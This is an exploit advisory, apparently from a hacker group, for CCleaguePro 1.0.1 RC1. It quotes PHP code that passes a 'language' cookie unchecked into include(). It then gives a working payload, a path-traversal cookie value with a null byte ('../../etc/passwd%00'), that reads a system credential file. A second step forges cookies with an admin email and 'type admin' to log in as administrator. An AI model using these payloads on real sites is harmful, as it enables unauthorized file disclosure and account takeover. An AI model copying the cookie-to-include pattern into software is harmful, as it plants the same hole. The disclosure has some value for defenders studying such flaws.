CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability ============================================================== CCleaguePro Version: 1.0.1 RC1 Website URL:http://www.castillocentral.com/ ============================================================== Discoved by Snake [Unkn0wn Security Researcher] The original article can be found at: http://unkn0wn.awardspace.com/ ============================================================== [XIII Security ResearcherZ] Gr33tZ t0 :l0pht.blackhat,Kouros,Sasan, All Iranian Hackerz ============================================================== Vulnerable code is in index.php & some 0ther pageZ in line 27-35 : ---------------cut here ---------------> if($_COOKIE["language"]) { $llang = $_COOKIE["language"]; } else { $l_array = explode("-",$lang_array[0]); $llang = $l_array[0]; setcookie("language",$llang,time()+1209600,"","",""); } include("lang/".$llang.".php"); ---------------cut here ---------------< ============================================================== Ex: open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies): ---------------cut here ---------------> language en to language ../../../../../../../../../etc/passwd%00 ---------------cut here ---------------< in you found admin's email for login can chang cookeis some thing like this: >---------------cut here --------------- u snake%40lolo.com type admin ---------------cut here ---------------< and login Admin!
